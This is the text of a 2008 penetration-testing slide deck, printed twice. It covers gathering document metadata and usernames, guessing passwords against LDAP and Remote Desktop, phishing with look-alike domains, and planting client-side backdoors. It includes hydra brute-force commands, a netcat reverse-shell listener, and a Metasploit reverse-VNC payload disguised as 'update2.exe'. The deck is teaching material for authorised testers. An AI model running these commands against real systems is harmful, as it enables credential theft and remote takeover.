Beyond Front-line Exploits
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Beyond Front-line Exploits as PDF for free.
More details
- Words: 937
- Pages: 44
Beyond Front-Line Exploits: Tips and Tools for Comprehensive Penetration Testing
Lenny Zeltser Security Consultant, SAVVIS Senior Faculty Member, SANS Institute Handler, SANS Internet Storm Center
August 2008
Pen testing usually involves locating and exploiting software bugs.
© 2008 Lenny Zeltser
2
Attack surface of many server environments is very limited.
What if you couldn’t exploit any software vulnerabilities?
© 2008 Lenny Zeltser
3
Consider 4 techniques for going beyond the front-line approach.
Data in plain sight
Social engineering
Remote passwordguessing
Client-side backdoors
4
#1: Data in plain sight
5
Google
site:example.com
filetype:pdf
site:example.com
filetype:ppt
site:example.com
filetype:doc
© 2008 Lenny Zeltser
6
© 2008 Lenny Zeltser
7
libextractor
$ extract
sample.pdf
sample.ppt
sample.doc
$ extract overview.ppt paragraph count - 2 last saved by - Lenny Zeltser title - Project overview creation date - 2008-03-14T01:58:53Z creator - John Smith word count - 5 date - 2008-03-14T04:56:57Z generator - Microsoft Office PowerPoint
© 2008 Lenny Zeltser
8
© 2008 Lenny Zeltser
9
Google + libextractor = Metagoofil
$ metagoofil.py -d example.com -f all -l 10 –o o.html –t o
$ metagoofil.py -d zeltser.com -f all -l 10 –o o.html –t o [+] Searching in zeltser.com for: pdf [+] Total results in google: 11 [ 1/11 ] http://www.zeltser.com/.../impersonation-attacks.pdf [ 2/11 ] http://www.zeltser.com/.../multi-firewall.pdf ... [+] Searching results: 0 [ 1/1 ] http://www.zeltser.com/.../malicious-agents.ppt Usernames found: ================ Lenny Zeltser (www.zeltser.com)
© 2008 Lenny Zeltser
10
Finding documents via Maltego
© 2008 Lenny Zeltser
11
Finding interesting files via Maltego
© 2008 Lenny Zeltser
12
#2: Remote Password-Guessing
13
Potential usernames: ranked word lists
http://www.census.gov/genealogy/names/names_files.html
Top Last Names
Top Female First Names
Top Male First Names
smith
mary
james
johnson
patricia
john
williams
linda
robert
jones
barbara
michael
brown
elizabeth
william
davis
jennifer
david
miller
maria
richard
© 2008 Lenny Zeltser
14
Potential usernames: theHarvester $ theHarvester.py -d example.com –l 3 -b google [email protected] [email protected] [email protected]
$ theHarvester.py -d example.com –l 3 -b linkedin Mark Jameson James Quieras Robert Marcus
$ theHarvester.py -d example.com –l 3 -b pgp [email protected] [email protected] [email protected] © 2008 Lenny Zeltser
15
Wrong username vs. password
© 2008 Lenny Zeltser
16
Confirm usernames with Brutus by varying only usernames.
Many
One
© 2008 Lenny Zeltser
17
A head-on brute-force password attack will probably fail.
Create a short list of potential passwords.
© 2008 Lenny Zeltser
18
Some common generic passwords
password
baseball1
iloveyou
querty1
soccer
password1
football1
iloveyou1
querty123
windows
abc123
123456
monkey
bitch1
1qaz2wsx
123abc
123123
cookie123
flower
gospel
fuckyou
monkey1
miss4you
123qwe
superman 1
fuckyou1
princess1
clumsy
manager
admin
© 2008 Lenny Zeltser
19
Best results with a companyspecific dictionary file
Briefly Britain British brother browser Bugtraq Bugbear bundled
© 2008 Lenny Zeltser
20
Password recovery mechanisms are weak links.
They often depend on security of the email system. © 2008 Lenny Zeltser
21
Also, “secret question” recovery is a prime candidate for attack.
© 2008 Lenny Zeltser
22
Letting users select their own questions is particularly weak.
© 2008 Lenny Zeltser
23
Use LDAP if you find it—much faster authentication.
$ hydra -L users.txt –P passwords.txt ldap.example.com ldap2 Hydra v5.4 (c) 2006 by van Hauser / THC Hydra (http://www.thc.org) 15 tasks, 26753 login tries [DATA] attacking service ldap2 on port 389 [389][ldap] login: CN=Robert Marcus,OU=IT,O=ACME Example password: Bugbear
$ k0ld –f users.txt -w passwords.txt -I -o out.txt -f 'cn=*' -h ldap.example.com
© 2008 Lenny Zeltser
24
Brute-force Remote Desktop credentials with TSGrinder.
© 2008 Lenny Zeltser
25
TSGrinder is slow, and requires an older Remote Desktop client (v5).
© 2008 Lenny Zeltser
26
#3: Social engineering
27
Tricking employees to release information works too well.
© 2008 Lenny Zeltser
28
Email phishing-style campaigns can obtain logon credentials.
© 2008 Lenny Zeltser
29
ArGoSoft Mail Server Freeware helps relay spoofed email.
© 2008 Lenny Zeltser
30
You can register a domain that resembles that of the target.
http://www.domaintools.com/domain-typo
xeample.com eaxmple.com exampe.net exapmle.com eaxmple.com wwwexample.co m exampel.com © 2008 Lenny Zeltser
31
Too many users will give up their logon credentials.
© 2008 Lenny Zeltser
32
The site can also capture client-side details for follow-on attacks.
USER: jsmith PASSWORD: plumlips LOCAL IP: 192.168.2.144 REMOTE IP: 208.77.188.166 PORT: 61035 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; enUS; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 PLUGINS: Move Media Player; QuickTime Plug-in 7.4.1; Mozilla Default Plug-in; RealJukebox NS Plugin; RealPlayer(tm) G2 LiveConnect-Enabled Plug-In (32-bit); Shockwave Flash; Java(TM) Platform SE 6 U2;
© 2008 Lenny Zeltser
33
#4: Client-Side Backdoors
34
Keeping up with security patches on laptops and desktops is hard.
© 2008 Lenny Zeltser
35
Tools such as Core Impact and Metasploit help target client-side vulnerabilities.
© 2008 Lenny Zeltser
36
It may be more effective just to ask the user to install the backdoor.
© 2008 Lenny Zeltser
37
The backdoor can connect to the attacking system via reverse-shell.
$ C:\attacker> nc -l -p 80 Microsoft Windows [Version 6.0.6000] Copyright (c) 2006 Microsoft Corporation. All rights reserved C:\Windows\Temp> dir ...
© 2008 Lenny Zeltser
38
Metasploit can generate stand-alone payloads. Example: Reverse-VNC.
$ msfpayload windows/vncinject/reverse_tcp LPORT=5544 LHOST=192.168.1.124 DisableCourtesyShell=True X > update2.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/vncinject/reverse_tcp Length: 177 Options: LHOST=192.168.1.124,LPORT=5544, DisableCourtesyShell=True
$ msfcli exploit/multi/handler LPORT=5544 PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.124 DisableCourtesyShell=True E
© 2008 Lenny Zeltser
39
Reverse-VNC can control a system even if it is behind a firewall.
© 2008 Lenny Zeltser
40
A system compromise is just a means to an end.
© 2008 Lenny Zeltser
41
Consider previous scenarios when defining your rules of engagement.
© 2008 Lenny Zeltser
42
These approaches increase the chances of a “successful” pen test.
Data in plain sight
Social engineering
Remote passwordguessing
Client-side backdoors
© 2008 Lenny Zeltser
43
Lenny Zeltser www.zeltser.com
© 2008 Lenny Zeltser
44
Lenny Zeltser Security Consultant, SAVVIS Senior Faculty Member, SANS Institute Handler, SANS Internet Storm Center
August 2008
Pen testing usually involves locating and exploiting software bugs.
© 2008 Lenny Zeltser
2
Attack surface of many server environments is very limited.
What if you couldn’t exploit any software vulnerabilities?
© 2008 Lenny Zeltser
3
Consider 4 techniques for going beyond the front-line approach.
Data in plain sight
Social engineering
Remote passwordguessing
Client-side backdoors
4
#1: Data in plain sight
5
site:example.com
filetype:pdf
site:example.com
filetype:ppt
site:example.com
filetype:doc
© 2008 Lenny Zeltser
6
© 2008 Lenny Zeltser
7
libextractor
$ extract
sample.pdf
sample.ppt
sample.doc
$ extract overview.ppt paragraph count - 2 last saved by - Lenny Zeltser title - Project overview creation date - 2008-03-14T01:58:53Z creator - John Smith word count - 5 date - 2008-03-14T04:56:57Z generator - Microsoft Office PowerPoint
© 2008 Lenny Zeltser
8
© 2008 Lenny Zeltser
9
Google + libextractor = Metagoofil
$ metagoofil.py -d example.com -f all -l 10 –o o.html –t o
$ metagoofil.py -d zeltser.com -f all -l 10 –o o.html –t o [+] Searching in zeltser.com for: pdf [+] Total results in google: 11 [ 1/11 ] http://www.zeltser.com/.../impersonation-attacks.pdf [ 2/11 ] http://www.zeltser.com/.../multi-firewall.pdf ... [+] Searching results: 0 [ 1/1 ] http://www.zeltser.com/.../malicious-agents.ppt Usernames found: ================ Lenny Zeltser (www.zeltser.com)
© 2008 Lenny Zeltser
10
Finding documents via Maltego
© 2008 Lenny Zeltser
11
Finding interesting files via Maltego
© 2008 Lenny Zeltser
12
#2: Remote Password-Guessing
13
Potential usernames: ranked word lists
http://www.census.gov/genealogy/names/names_files.html
Top Last Names
Top Female First Names
Top Male First Names
smith
mary
james
johnson
patricia
john
williams
linda
robert
jones
barbara
michael
brown
elizabeth
william
davis
jennifer
david
miller
maria
richard
© 2008 Lenny Zeltser
14
Potential usernames: theHarvester $ theHarvester.py -d example.com –l 3 -b google [email protected] [email protected] [email protected]
$ theHarvester.py -d example.com –l 3 -b linkedin Mark Jameson James Quieras Robert Marcus
$ theHarvester.py -d example.com –l 3 -b pgp [email protected] [email protected] [email protected] © 2008 Lenny Zeltser
15
Wrong username vs. password
© 2008 Lenny Zeltser
16
Confirm usernames with Brutus by varying only usernames.
Many
One
© 2008 Lenny Zeltser
17
A head-on brute-force password attack will probably fail.
Create a short list of potential passwords.
© 2008 Lenny Zeltser
18
Some common generic passwords
password
baseball1
iloveyou
querty1
soccer
password1
football1
iloveyou1
querty123
windows
abc123
123456
monkey
bitch1
1qaz2wsx
123abc
123123
cookie123
flower
gospel
fuckyou
monkey1
miss4you
123qwe
superman 1
fuckyou1
princess1
clumsy
manager
admin
© 2008 Lenny Zeltser
19
Best results with a companyspecific dictionary file
Briefly Britain British brother browser Bugtraq Bugbear bundled
© 2008 Lenny Zeltser
20
Password recovery mechanisms are weak links.
They often depend on security of the email system. © 2008 Lenny Zeltser
21
Also, “secret question” recovery is a prime candidate for attack.
© 2008 Lenny Zeltser
22
Letting users select their own questions is particularly weak.
© 2008 Lenny Zeltser
23
Use LDAP if you find it—much faster authentication.
$ hydra -L users.txt –P passwords.txt ldap.example.com ldap2 Hydra v5.4 (c) 2006 by van Hauser / THC Hydra (http://www.thc.org) 15 tasks, 26753 login tries [DATA] attacking service ldap2 on port 389 [389][ldap] login: CN=Robert Marcus,OU=IT,O=ACME Example password: Bugbear
$ k0ld –f users.txt -w passwords.txt -I -o out.txt -f 'cn=*' -h ldap.example.com
© 2008 Lenny Zeltser
24
Brute-force Remote Desktop credentials with TSGrinder.
© 2008 Lenny Zeltser
25
TSGrinder is slow, and requires an older Remote Desktop client (v5).
© 2008 Lenny Zeltser
26
#3: Social engineering
27
Tricking employees to release information works too well.
© 2008 Lenny Zeltser
28
Email phishing-style campaigns can obtain logon credentials.
© 2008 Lenny Zeltser
29
ArGoSoft Mail Server Freeware helps relay spoofed email.
© 2008 Lenny Zeltser
30
You can register a domain that resembles that of the target.
http://www.domaintools.com/domain-typo
xeample.com eaxmple.com exampe.net exapmle.com eaxmple.com wwwexample.co m exampel.com © 2008 Lenny Zeltser
31
Too many users will give up their logon credentials.
© 2008 Lenny Zeltser
32
The site can also capture client-side details for follow-on attacks.
USER: jsmith PASSWORD: plumlips LOCAL IP: 192.168.2.144 REMOTE IP: 208.77.188.166 PORT: 61035 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; enUS; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 PLUGINS: Move Media Player; QuickTime Plug-in 7.4.1; Mozilla Default Plug-in; RealJukebox NS Plugin; RealPlayer(tm) G2 LiveConnect-Enabled Plug-In (32-bit); Shockwave Flash; Java(TM) Platform SE 6 U2;
© 2008 Lenny Zeltser
33
#4: Client-Side Backdoors
34
Keeping up with security patches on laptops and desktops is hard.
© 2008 Lenny Zeltser
35
Tools such as Core Impact and Metasploit help target client-side vulnerabilities.
© 2008 Lenny Zeltser
36
It may be more effective just to ask the user to install the backdoor.
© 2008 Lenny Zeltser
37
The backdoor can connect to the attacking system via reverse-shell.
$ C:\attacker> nc -l -p 80 Microsoft Windows [Version 6.0.6000] Copyright (c) 2006 Microsoft Corporation. All rights reserved C:\Windows\Temp> dir ...
© 2008 Lenny Zeltser
38
Metasploit can generate stand-alone payloads. Example: Reverse-VNC.
$ msfpayload windows/vncinject/reverse_tcp LPORT=5544 LHOST=192.168.1.124 DisableCourtesyShell=True X > update2.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/vncinject/reverse_tcp Length: 177 Options: LHOST=192.168.1.124,LPORT=5544, DisableCourtesyShell=True
$ msfcli exploit/multi/handler LPORT=5544 PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.124 DisableCourtesyShell=True E
© 2008 Lenny Zeltser
39
Reverse-VNC can control a system even if it is behind a firewall.
© 2008 Lenny Zeltser
40
A system compromise is just a means to an end.
© 2008 Lenny Zeltser
41
Consider previous scenarios when defining your rules of engagement.
© 2008 Lenny Zeltser
42
These approaches increase the chances of a “successful” pen test.
Data in plain sight
Social engineering
Remote passwordguessing
Client-side backdoors
© 2008 Lenny Zeltser
43
Lenny Zeltser www.zeltser.com
© 2008 Lenny Zeltser
44
Related Documents
Beyond Front-line Exploits
October 2019 13
Pdf Exploits
December 2019 6
Climate Frontline
June 2020 12
Frontline Assembly
November 2019 14
Frontline Profile
November 2019 12